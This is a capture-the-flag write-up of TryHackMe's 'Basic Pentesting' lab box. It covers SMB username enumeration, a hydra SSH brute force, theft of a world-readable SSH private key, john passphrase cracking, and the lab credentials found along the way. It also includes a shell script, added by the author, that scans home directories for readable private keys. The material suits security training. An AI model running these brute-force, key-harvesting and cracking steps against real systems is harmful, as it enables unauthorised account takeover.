
TryHackMe — Basic Pentesting

Difficulty: Easy Date: June 29, 2026 Author: Ross Fisher


Overview

Basic Pentesting teaches a realistic engagement workflow: read notes left by developers, extract usernames from SMB, brute force SSH, pivot between users with a stolen SSH key, and crack its passphrase to get in. No fancy exploits, just enumeration, credential attacks, and following the breadcrumbs the box leaves you.

Credentials found:

  • jan:armando (SSH brute force)
  • kay key passphrase: beeswax

kay’s pass.bak contents: heresareallystrongpasswordthatfollowsthepasswordpolicy$$


Recon

Nmap

sudo nmap -sV -sC -p- --min-rate 5000 -Pn 10.144.128.155

Key ports:

  • 22 — OpenSSH 8.2p1
  • 80 — Apache 2.4.41
  • 139/445 — Samba SMB
  • 8009 — Apache Jserv AJP13
  • 8080 — Apache Tomcat 9.0.7

The -sC flag runs default NSE scripts which immediately pulled SMB signing info and the NetBIOS name BASIC2. Always use -sC when you see SMB open — it saves a separate enumeration step.

Web — /development

Gobuster found /development on port 80:

gobuster dir -u http://10.144.128.155 -w /usr/share/wordlists/dirb/common.txt -t 50

Inside were two developer notes that handed us everything we needed:

Note 1:

  • Apache Struts 2.5.12 running (known vulnerable version)
  • Written and signed by K

Note 2:

  • SMB configured — signed by K
  • K audited /etc/shadow and cracked J’s hash easily
  • J has a weak password, told to change it

This tells us two things immediately: there are two users whose names start with J and K, and J's password is weak enough that a colleague cracked it from the shadow file. The notes only give initials; the full usernames come from SMB next, and for the brute force we bet on rockyou.


SMB Enumeration — enum4linux

enum4linux -a 10.144.128.155

Confirmed the Unix usernames via RID cycling:

S-1-22-1-1000 Unix User\kay
S-1-22-1-1001 Unix User\jan
S-1-22-1-1002 Unix User\ubuntu

Also found an Anonymous share with read access — worth checking on future engagements even if it was empty here.


Foothold — Brute Forcing jan’s SSH Password

Armed with the username jan and the knowledge that the password is weak:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.144.128.155
# hydra warns that many SSH servers cap parallel sessions; add -t 4 if you see connection errors

Cracked in about 3 minutes:

[22][ssh] host: 10.144.128.155   login: jan   password: armando
ssh jan@10.144.128.155
# password: armando

Privilege Escalation — jan to kay

Enumeration as jan

sudo -l
# Sorry, user jan may not run sudo on ip-10-144-128-155.

find / -perm -u=s -type f 2>/dev/null
# Nothing useful — all standard system binaries

Checked kay’s home directory:

ls -la /home/kay/

Found:

  • pass.bak — no read permission as jan
  • .ssh/ directory — readable

ls -la /home/kay/.ssh/
# id_rsa is readable by everyone (permissions: -rw-r--r--)
cat /home/kay/.ssh/id_rsa

Kay’s SSH private key was world-readable. Copied it back to Kali.
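The check from this step, generalised: the script below is an added example written for this writeup, not code from the box or from TryHackMe. It walks a home tree for private keys that other local users can read and reports whether each one is passphrase-protected, so you can see at a glance which keys are worth copying off and cracking. The root directory (default /home) and the list of excluded filenames are assumptions; the header formats it matches (legacy PEM with Proc-Type: 4,ENCRYPTED, PKCS#8 ENCRYPTED PRIVATE KEY, and the OpenSSH format whose base64 body names bcrypt when a passphrase is set) are the standard ones.

```shell
#!/bin/sh
# Added example for this writeup (not a TryHackMe or OpenSSH tool): find SSH
# private keys under a tree that any local user can read, and say whether each
# is passphrase-protected. Run it as the low-privilege user you landed as so the
# results reflect exactly what that user can reach.

# Classify a private key file by its headers:
#   pem-encrypted, pem-cleartext, openssh-encrypted, openssh-cleartext, unknown
key_kind() {
    key="$1"
    first=$(head -n 1 "$key" 2>/dev/null)
    case "$first" in
        "-----BEGIN OPENSSH PRIVATE KEY-----")
            # New format: the decoded body starts with the cipher and KDF
            # names; "bcrypt" is present only when a passphrase is set.
            if grep -v -e '-----BEGIN' -e '-----END' "$key" \
                   | base64 -d 2>/dev/null | grep -q bcrypt; then
                echo openssh-encrypted
            else
                echo openssh-cleartext
            fi ;;
        "-----BEGIN ENCRYPTED PRIVATE KEY-----")
            # PKCS#8 with a passphrase.
            echo pem-encrypted ;;
        "-----BEGIN "*"PRIVATE KEY-----")
            # Legacy PEM: an encrypted key carries "Proc-Type: 4,ENCRYPTED".
            if grep -q '^Proc-Type: 4,ENCRYPTED' "$key"; then
                echo pem-encrypted
            else
                echo pem-cleartext
            fi ;;
        *)  echo unknown ;;
    esac
}

# Print one line per world-readable private key under ROOT (default /home):
#   <path> <octal mode> <kind>
# Excluded names are an assumption: public keys and the usual non-key files.
audit_ssh_keys() {
    root="${1:-/home}"
    find "$root" -path '*/.ssh/*' -type f ! -name '*.pub' \
         ! -name authorized_keys ! -name known_hosts ! -name config \
         -perm -004 2>/dev/null |
    while IFS= read -r key; do
        kind=$(key_kind "$key")
        if [ "$kind" = unknown ]; then
            continue
        fi
        mode=$(stat -c %a "$key" 2>/dev/null || stat -f %Lp "$key")
        echo "$key $mode $kind"
    done
}

# Interactive use: sh audit_keys.sh --run /home
if [ "${1:-}" = "--run" ]; then
    audit_ssh_keys "${2:-/home}"
fi
```

On this box the output would be a single line for /home/kay/.ssh/id_rsa with mode 644 and kind pem-encrypted, which is exactly the combination (readable by jan, legacy PEM, weak KDF) that makes the ssh2john route worth taking. A mode of 600 never appears because -perm -004 filters it out before the file is even opened.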

Cracking the Key Passphrase

The key header showed Proc-Type: 4,ENCRYPTED, so the key is passphrase protected. That header also means it is in the legacy PEM format, where the passphrase is run through a single MD5 round before the key material is encrypted, so rockyou goes through in seconds; a key in the newer OpenSSH format (-----BEGIN OPENSSH PRIVATE KEY-----) uses bcrypt and cracks orders of magnitude slower. Used ssh2john to convert it to a crackable format:

ssh2john ~/THM/kay_key > ~/THM/kay_hash.txt
john ~/THM/kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cracked instantly:

beeswax    (/home/ross/THM/kay_key)

SSH as kay

chmod 600 ~/THM/kay_key
ssh -i ~/THM/kay_key kay@10.144.128.155
# passphrase: beeswax
cat pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Attack Chain Summary

Nmap → SMB + HTTP on 80
→ gobuster → /development → dev notes → usernames jan + kay
→ enum4linux → confirmed jan + kay as Unix users
→ hydra SSH brute force → jan:armando
→ SSH as jan
→ /home/kay/.ssh/id_rsa (world-readable)
→ ssh2john + john → passphrase: beeswax
→ SSH as kay → pass.bak

Key Lessons

1. Developer notes are goldmines. The /development directory handed us usernames, a hint that one password is weak, and information about the tech stack. Always read everything on the web server.

2. enum4linux for any box with 139/445 open. It confirmed the exact Unix usernames via null session RID cycling. It also reported a minimum password length of 5 in the password policy, another sign the password would not be complex.

3. Check SSH key permissions. Kay’s id_rsa was world-readable (-rw-r--r--). That’s a misconfiguration that gives any local user a path to escalate. Always check /home/*/.ssh/ when you’re on a box as a low-priv user.

4. ssh2john is the tool for passphrase-protected keys. Same workflow as any other john crack — convert to hash format, run against rockyou.

5. File path matters. Spent time debugging because ~/kay_key resolves to /home/ross/kay_key but the file was in ~/THM/kay_key. Always check ls before assuming a file exists where you think it does.


Tools Used

  • nmap (-sV -sC)
  • gobuster
  • enum4linux
  • hydra
  • ssh
  • ssh2john
  • john
